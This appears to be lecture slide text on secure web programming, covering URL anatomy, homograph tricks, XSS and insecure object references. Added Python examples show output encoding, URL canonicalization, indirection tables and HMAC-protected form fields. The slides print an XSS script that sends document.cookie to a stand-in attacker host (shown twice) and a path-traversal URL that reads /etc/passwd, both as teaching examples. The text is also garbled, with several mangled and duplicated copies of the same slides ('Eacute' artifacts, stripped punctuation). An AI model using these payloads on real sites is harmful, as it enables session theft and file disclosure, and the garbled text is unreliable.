Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code]
Example injected script:
<script>document.location.replace("http://www.badguy.example/steal.php?what=" + document.cookie)</script>
- redirects victim's browser to attacker's site, passing cookie
- might also pass currently visited web page
- then attacker's server can issue a redirect back again
Reflected XSS
Reflected XSS occurs when injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose
http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc
dynamically makes HTML embedding title directly:
<h1>Man GCC</h1>
An attacker could use this with a malicious input
title=<script>...</script>&program=gcc
which e.g. steals a cookie.
Exercise: Explain how this attack works in practice.
XSS Solutions
Input processing: tricky, need to understand data flow through app: quoting, encoding, passed to/from functions, databases, etc. Hence output filtering.
Plain output: HTML encoding
- Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt;, etc.)
Marked-up output: complex filtering
- Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.
Marked-up output: DSL
- A better approach: use a dedicated syntax, convert to restricted subset of HTML
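An added example in Python, not from the lecture: the plain-output encoder and a small dedicated-syntax (DSL) renderer that emits only a restricted HTML subset. The three-rule mini-markup and the link-scheme allowlist are constructed for this illustration.

```python
"""Output filtering for XSS: HTML-encode plain values, and render marked-up
input through a small DSL instead of letting raw HTML through.

Added example (not from the lecture). The DSL is a constructed three-rule
mini-markup: *bold*, _italic_ and [text](url); everything else is literal text.
"""
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Only these link schemes may appear in rendered output; javascript: never does.
SAFE_LINK_SCHEMES = {"http", "https", "mailto"}

_TOKEN = re.compile(
    r"\*(?P<bold>[^*\n]+)\*"                          # *bold*
    r"|_(?P<ital>[^_\n]+)_"                           # _italic_
    r"|\[(?P<text>[^\]\n]+)\]\((?P<url>[^)\s]+)\)"    # [text](url)
)


def encode_plain(value: str) -> str:
    """Plain output: every stored value is entity-encoded before it hits HTML.
    '<' becomes '&lt;', '&' becomes '&amp;'; quotes are encoded too, so the same
    function is safe inside double-quoted attribute values."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> Optional[str]:
    """Return the URL if its scheme is on the allowlist, else None."""
    try:
        scheme = urlsplit(url.strip()).scheme.lower()
    except ValueError:
        return None
    return url if scheme in SAFE_LINK_SCHEMES else None


def render_dsl(text: str) -> str:
    """Marked-up output via a DSL: convert the mini-markup to a fixed, restricted
    subset of HTML (<b>, <i>, <a href>). Raw tags in the input are never
    interpreted, only encoded, so there is no tag list to get wrong."""
    out = []
    pos = 0
    for m in _TOKEN.finditer(text):
        out.append(encode_plain(text[pos:m.start()]))  # literal text between tokens
        if m.group("bold") is not None:
            out.append(f"<b>{encode_plain(m.group('bold'))}</b>")
        elif m.group("ital") is not None:
            out.append(f"<i>{encode_plain(m.group('ital'))}</i>")
        else:
            href = safe_href(m.group("url"))
            label = encode_plain(m.group("text"))
            if href is None:
                # Disallowed scheme: keep the visible text, emit no <a> at all.
                out.append(label)
            else:
                out.append(f'<a href="{encode_plain(href)}">{label}</a>')
        pos = m.end()
    out.append(encode_plain(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample: the reflected-XSS title from the slides, with markup.
    print(render_dsl("Man *GCC* <script>document.cookie</script>"))
    print(render_dsl("[click](javascript:document.cookie) [docs](https://example.com/?a=1&b=2)"))
```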
Outline
- Overview
- Basics: URLs
- Output Filtering and XSS
- Object references
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction
A "cool" PHP script showhtml.php:
- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to wrapped version
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd
- remote users can visit any file on the system
- mistake motivates defence-in-depth
- http server should not serve up any file
- use internal web server config (separate apps)
- and external OS config (e.g. nobody user, chroot)
Authorization and object access
What was the problem here?
- the app developer (implicitly) authorized users to read documentation files he had created
- project was open source, no need for logins
- app contained no paths to files outside the project
- so no explicit authorization code was written
- but PHP code didn't check the filename returned
- showhtml.php provided access to server objects
- input validation only checked for file existence
There should have been a re-authorization step. A well-written app should only allow access to its own resources.
Looking at anyone's bank account
<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>
Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".
A genius, clearly.
Solutions for object referencing
Re-validate
- Check authorization again
- Obvious solution, but duplicates effort
Add a data indirection
- Session-specific server-side array of account nos.
<option value="1">12345678901</option>
<option value="2">12346543210</option>
- Similarly for file access:
http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction
for many files, a hash table or database could be used
Passing too much information
Old flaw: passing unnecessary information to the client and expecting it back unmodified.
<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>
Protecting information in server data
Sometimes the server must pass information to the client during the interaction, but must protect it.
Example: editing a wiki page
<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>
Solution: add a MAC constructed with a server-side secret key
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">
Or could encrypt the pagename.
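Added example code (not from the lecture or the quoted books) showing both remedies from the last two slides: a session-specific indirection table that issues the small indices shown for the account form, and an HMAC over the hidden pagename field, verified on submission. The secret key and the Session class are constructed for the example.

```python
"""Two defences for insecure direct object references (added example, not
from the lecture): a per-session indirection table for account numbers or
file names, and an HMAC on a hidden form field so the client cannot alter it
without detection.
"""
import hashlib
import hmac
import html
import secrets
from typing import Dict, Iterable, Optional

# Server-side secret key. In a real deployment it is generated once, stored
# outside source control and shared by all server processes; here it is
# constructed per run, so MACs are only valid within this process.
SERVER_SECRET = secrets.token_bytes(32)


class Session:
    """Minimal server-side session holding a data indirection table: the page
    shows small indices (1, 2, ...) and only this session can map them back."""

    def __init__(self) -> None:
        self._objects: Dict[str, str] = {}

    def issue_ref(self, real_id: str) -> str:
        """Register a real identifier (account number, file name) and return
        the opaque index the client is allowed to send back."""
        index = str(len(self._objects) + 1)
        self._objects[index] = real_id
        return index

    def resolve_ref(self, index: str) -> Optional[str]:
        """Map a client-supplied index back to the real identifier. Anything
        not issued to this session resolves to None, so a user cannot name an
        account or file that was never offered to them."""
        return self._objects.get(index)


def account_options(session: Session, accounts: Iterable[str]) -> str:
    """Render the <select> options from the slides with indices instead of
    account numbers as the submitted values."""
    return "".join(
        f'<option value="{html.escape(session.issue_ref(acct))}">{html.escape(acct)}</option>'
        for acct in accounts
    )


def mac_for(value: str) -> str:
    """MAC a hidden-field value with the server secret (HMAC-SHA256, hex)."""
    return hmac.new(SERVER_SECRET, value.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_mac(value: str, mac: str) -> bool:
    """Constant-time check that a submitted value still carries a valid MAC;
    False means the client changed pagename, pagemac, or both."""
    return hmac.compare_digest(mac_for(value), mac)


if __name__ == "__main__":
    s = Session()
    print(account_options(s, ["12345678901", "12346543210"]))
    print("index 1 ->", s.resolve_ref("1"), "| raw number ->", s.resolve_ref("12345678901"))
    tag = mac_for("NineteenSixtiesToys")
    print("genuine:", verify_mac("NineteenSixtiesToys", tag), "tampered:", verify_mac("MainPage", tag))
```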
Other authorization mistakes
Assuming requests occur in proper order
- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
- only checking authorization on the first step
Authorization by obscurity
- Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it:
http://www.myserver.com/secretarea/privatepaper.pdf
Review questions
URLs
- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?
XSS
- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Object references
- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.
References
Some commentary and examples were taken from the texts
- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012 (Recommended)
as well as the named RFCs.
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path

/path/to/resource
- A Unix-style path. Must resolve . and ..
- Relative paths allow for non-fully-qualified URLs
- old style apps:
  - direct connection with the file system
  - resource = HTML file served by the server
- modern apps:
  - very indirect: complicated URL rewriting, dynamic content
  - paths mapped to parts of programs or a database
  - server may be embedded in the app
Question: What implications does this have for reviewing the security of web apps?
Query string

?search=purple+bananas
Optional; intended to pass arbitrary parameters to the resource. The commonly used syntax
name1=value1&name2=value2
is not part of URL syntax. That syntax is related to mail and HTML forms. So:
- the server may not presume/enforce a query string format
- web applications may legally use other forms after ?
Fragment identifier

#lastsection
- Interpretation depends on the client resource type; in practice, anchor names in HTML elements
- Not intended to be sent to the server
- Recent use: store client-side state while browsing
  - can be changed without a page reload
  - easily bookmarked, shared
  - e.g. map locations
Metacharacters

- Some punctuation characters are not allowed, e.g. [ ] $ & ' ( ) =
- These are URL encoded with percent-ASCII hex, e.g. %2F encodes /, %25 encodes %
The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible, e.g. http://%65xample.%63om/
Moreover, RFCs are not always followed.
Non-ASCII text encodings in URLs

- Original standards did not allow for non-ASCII text, but it is clearly desirable for non-English text
- RFC 3492 introduced Punycode to allow a behind-the-scenes DNS lookup
  - DNS lookup: xn--[US-ASCII]-[encoded Unicode]
  - Browser displays the Unicode part
The extension from 38 characters to 100,000 glyphs allowed many homograph attacks:
- pea.com has 5 identical-looking Cyrillic chars
- there are non-slash characters that look like /
- some attacks are not easily prevented by DNS registrars
We have (puny) browser and search engine defences for this. Moral: probably better to stick with ASCII.
Overall consequences

Parsing URLs is more complicated than you imagined:
- better to use well-tested libraries than ad hoc code
But for output, want to be very careful:
- especially if URLs are made from user (attacker) input
- should canonicalize, then filter/reformat
- filter especially on the scheme and authority
Overall consequences

Eyeballs can easily be fooled when looking at URLs:
http://example.com&gibberish=1234@167772161/
http://example.com\@coredump.cx/
http://example.com;.coredump.cx/
Which server is visited by these URLs?
Examples from The Tangled Web.
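The "canonicalize, then filter on scheme and authority" advice above, and the question of which server the confusing URLs actually reach, can both be made concrete with a small validator for a user-supplied redirect target. This is an added example, not code from the lecture or from The Tangled Web; it uses only the Python standard library, and the allowlist of hosts is a constructed assumption. It also applies the "stick with ASCII" moral by refusing non-ASCII and punycode host labels, and refuses numeric hosts that are not strict IP literals (the http://0x7f.1/ case).

```python
"""Canonicalize-then-filter for URLs taken from user input (added example).

A redirect target is accepted only if it is an http(s) URL, carries no
credentials, names an ASCII host on the allowlist and uses the default
port. Anything the parser finds ambiguous is refused rather than guessed.
"""
import ipaddress
import re
from urllib.parse import quote, unquote, urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"example.com", "www.example.com"}  # constructed allowlist, an assumption
# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def real_host(url):
    """The host an RFC-style parser connects to (lower-cased), or None.

    This is the answer to "which server is visited?": everything before the
    last '@' in the authority is treated as credentials, not as the host.
    """
    return urlsplit(url).hostname


def check_host(host):
    """Raise ValueError unless host is an unambiguous ASCII DNS name or IP literal."""
    if not host:
        raise ValueError("missing host")
    if not host.isascii():
        raise ValueError("non-ASCII host (homograph risk)")
    labels = host.split(".")
    if ":" in host or labels[-1].isdigit():
        # Looks like an IP literal: accept only the strict dotted-quad / IPv6
        # spelling, not browser-only forms such as 0x7f.1 or 167772161.
        ipaddress.ip_address(host)  # raises ValueError if not strict
        return
    for label in labels:
        if label.startswith("xn--"):
            raise ValueError("punycode label")
        if not LABEL_RE.match(label):
            raise ValueError("bad label %r" % label)


def canonicalize(url):
    """Return a canonical form of url, or raise ValueError if it is not acceptable."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme %r not allowed" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in authority")
    if parts.port is not None:
        raise ValueError("explicit port not allowed")
    host = parts.hostname
    check_host(host)
    if host not in ALLOWED_HOSTS:
        raise ValueError("host %r not on allowlist" % host)
    # Decode the path once, then re-encode it, so every reserved byte has a
    # single spelling (%2f and %2F and / no longer differ).
    path = quote(unquote(parts.path or "/"), safe="/")
    # The query is the application's own syntax; it is passed through as given.
    query = parts.query
    # The fragment is never sent to the server, so it is dropped.
    return urlunsplit((scheme, host, path, query, ""))


def is_safe_redirect(url):
    """Boolean wrapper for use at a redirect endpoint."""
    try:
        canonicalize(url)
        return True
    except ValueError:
        return False
```

Note that the validator rejects the credentials form outright rather than trying to work out whether "example.com&gibberish=1234" was meant as a user name; for a redirect target there is no legitimate reason to carry credentials, so refusing is both simpler and safer than guessing what each browser will do.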
XSS attacks in general

- Attack typically on (another) user of the web app
- Attacker tricks the app into displaying malicious code, typically script code
Many possible aims:
- display random images, popup windows
- change page contents, e.g. alter a bank account number
- session hijacking: steal session cookies
Session hijacking with XSS

[Picture from Innocent Code]
Example injected script:
<script>document.location.replace("http://www.badguy.example/steal.php?" + "what=" + document.cookie)</script>
- redirects the victim's browser to the attacker's site, passing the cookie
- might also pass the currently visited web page; then the attacker's server can issue a redirect back again
Reflected XSS

Reflected XSS occurs when the injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose
http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc
dynamically makes HTML embedding title directly:
<h1>Man GCC</h1>
An attacker could use this with a malicious input
title=<script>…</script>&program=gcc
which e.g. steals a cookie.
Exercise: Explain how this attack works in practice.
XSS Solutions

Input processing is tricky: one needs to understand the data flow through the app (quoting, encoding, values passed to/from functions, databases, etc.). Hence output filtering.
Plain output: HTML encoding
- Stored data values need to be encoded to represent them in HTML (e.g. < converted to &lt; etc.)
Marked-up output: complex filtering
- Need to work through tags in the input and rule out risky ones. Scripts may appear in attributes. Flaky.
Marked-up output: DSL
- A better approach: use a dedicated syntax, converted to a restricted subset of HTML.
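The first and third solutions above (encode plain output per context; accept marked-up input only through a restricted DSL) are illustrated by this added example, written for this page and not taken from the lecture or from Innocent Code. The DSL itself (*bold* and [text](url)) is a constructed toy; the point is that only two HTML constructs can ever be emitted, link targets are restricted to http(s), and everything else, including literal tags in the input, is encoded as data.

```python
"""Output filtering for XSS (added example, not the lecture's code).

Plain output is HTML-encoded for its context (text or attribute), and
marked-up output is written in a tiny constructed DSL that is translated
into a restricted HTML subset: <b> and <a href> only.
"""
import html
import re
from urllib.parse import urlsplit

SAFE_LINK_SCHEMES = {"http", "https"}

# Constructed DSL: *bold text* or [link text](url). Nothing else is markup.
MARKUP_RE = re.compile(
    r"\*(?P<bold>[^*\n]+)\*|\[(?P<text>[^\]\n]+)\]\((?P<url>[^)\s]+)\)")


def render_heading(title):
    """Text context: encode the data value, so <script> in a title is shown, not run."""
    return "<h1>" + html.escape(title, quote=False) + "</h1>"


def render_attribute(name, value):
    """Attribute context: always quote the attribute and encode the quote characters,
    so a value cannot close the attribute and start a new one."""
    return '%s="%s"' % (name, html.escape(value, quote=True))


def safe_link_target(url):
    """Only absolute http(s) URLs may become links; javascript: and friends become text."""
    parts = urlsplit(url)
    return parts.scheme.lower() in SAFE_LINK_SCHEMES and bool(parts.netloc)


def render_markup(src):
    """Translate the DSL into <b> and <a href> only; all other text is encoded."""
    out = []
    pos = 0
    for m in MARKUP_RE.finditer(src):
        out.append(html.escape(src[pos:m.start()]))
        if m.group("bold") is not None:
            out.append("<b>%s</b>" % html.escape(m.group("bold")))
        elif safe_link_target(m.group("url")):
            out.append('<a href="%s">%s</a>' % (
                html.escape(m.group("url"), quote=True),
                html.escape(m.group("text"))))
        else:
            # Unsafe link target: render the DSL source literally, as encoded text.
            out.append(html.escape(m.group(0)))
        pos = m.end()
    out.append(html.escape(src[pos:]))
    return "".join(out)
```

The design choice worth noticing is that the renderer never has to decide which input tags are "risky": the input contains no HTML at all from the renderer's point of view, only DSL tokens and data, which is what makes this approach less flaky than filtering a tag list.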
Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction
A "cool" PHP script, showhtml.php:
- take a plain HTML file
- wrap it with navigation links and the site style
- convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd
- remote users can visit any file on the system
- the mistake motivates defence-in-depth:
  - the http server should not serve up any file
  - use internal web server config (separate apps)
  - and external OS config (e.g. nobody user, chroot)
Authorization and object access

What was the problem here?
- the app developer (implicitly) authorized users to read documentation files he had created
  - the project was open source, so no need for logins
  - the app contained no paths to files outside the project
  - so no explicit authorization code was written
- but the PHP code didn't check the filename returned
  - showhtml.php provided access to server objects
  - input validation only checked for file existence
There should have been a re-authorization step. A well-written app should only allow access to its own resources.
Looking at anyone's bank account

<form action="show-account.asp" method="get">
Account to display: <select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>
Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".
A genius, clearly.
Solutions for object referencing

Re-validate:
- Check authorization again
- Obvious solution, but duplicates effort
Add a data indirection:
- Session-specific server-side array of account nos.
<option value="1">12345678901</option>
<option value="2">12346543210</option>
- Similarly for file access:
http://researchsite.ed.ac.uk/showhtml.php?file=1#Introduction
For many files, a hash table or database could be used.
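The data-indirection solution above, together with the defence-in-depth point from the showhtml.php slides, as an added example written for this page (not the lecture's or the book's code). The session object map hands the client only small indices and resolves them server-side, so an account number or file name that was never offered to this session cannot be requested; the path check is the separate, belt-and-braces layer that refuses anything resolving outside the document root even if the mapping were wrong. The form action name and document root are constructed assumptions.

```python
"""Indirect object references plus a containment check (added example).

Client-visible values are per-session indices; the real identifiers never
leave the server. For file access a second, independent check confirms the
resolved path is inside the document root.
"""
import html
import os


class SessionObjectMap:
    """Per-session indirection table: the client sees 1, 2, 3..., the server keeps the real ids."""

    def __init__(self):
        self._objects = []

    def add(self, real_id):
        """Register a real id for this session and return its client-side index."""
        self._objects.append(real_id)
        return len(self._objects)

    def resolve(self, index_str):
        """Map a submitted index back to the real id, or None if it was never offered."""
        try:
            i = int(index_str)
        except ValueError:
            return None
        if 1 <= i <= len(self._objects):
            return self._objects[i - 1]
        return None

    def options_html(self):
        """<option> elements showing the real value but submitting only the index."""
        return "".join('<option value="%d">%s</option>' % (i, html.escape(str(o)))
                       for i, o in enumerate(self._objects, 1))


def build_account_form(session_map, accounts):
    """Render the account chooser; 'accounts' are the ones this user is authorized for."""
    for acct in accounts:
        session_map.add(acct)
    return ('<form action="show-account" method="get">'  # constructed action name
            'Account to display: <select name="account">%s</select>'
            '<input type="submit" name="show" value="Show Account"></form>'
            % session_map.options_html())


def safe_doc_path(docroot, relative):
    """Defence in depth for a showhtml-style viewer: the resolved path must stay inside docroot.

    Returns the absolute path, or None for absolute inputs, '..' escapes and symlinks out.
    """
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```

In a real application the map would live in the server-side session store keyed by session id, and resolve() would be the only way a request parameter ever becomes an account number or file name.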
Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.
<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>
Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.
Example: editing a wiki page
<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>
Solution: add a MAC constructed with a server-side secret key
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">
Or could encrypt the pagename.
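The MAC solution above, as an added example (not code from the lecture or from the wiki it describes). The field name is included in the MAC input so that a MAC issued for one hidden field cannot be presented as the MAC of another, and verification uses a constant-time comparison. The key is a constructed placeholder; a deployment would load it from server-side configuration.

```python
"""Integrity-protected hidden form field (added example, not the page's code).

The wiki keeps `pagename` in a hidden input; an HMAC computed with a
server-side secret lets the server detect any change made by the client.
"""
import hashlib
import hmac
import html

SERVER_KEY = b"constructed-demo-key-not-for-use"  # placeholder; a real key comes from config


def field_mac(name, value, key=SERVER_KEY):
    """HMAC-SHA256 over the field name and value, hex-encoded.

    Binding the name prevents a MAC for one field being replayed as another's;
    the NUL separator keeps ("ab","c") and ("a","bc") distinct.
    """
    msg = name.encode("utf-8") + b"\x00" + value.encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def protected_hidden_fields(name, value, mac_name):
    """Render the field and its MAC as two hidden inputs (value HTML-encoded)."""
    return ('<input type="hidden" name="%s" value="%s">'
            '<input type="hidden" name="%s" value="%s">'
            % (name, html.escape(value, quote=True), mac_name, field_mac(name, value)))


def verify_field(name, value, mac):
    """True only if mac is the correct MAC for (name, value); constant-time compare."""
    return hmac.compare_digest(field_mac(name, value), mac)
```

A MAC gives integrity, not secrecy: the client can still read pagename. Where the value itself must be hidden, the slide's alternative of encrypting it applies, and an authenticated encryption mode then provides both properties at once.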
Other authorization mistakes

Assuming requests occur in proper order
- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST; only checking authorization on the first step
Authorization by obscurity
- Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it:
http://www.myserver.com/secretarea/privatepaper.pdf
Review questions

URLs
- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?
XSS
- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Object references
- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.
References

Some commentary and examples were taken from the texts:
- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley, 2004
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press, 2012 (Recommended)
as well as the named RFCs.
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
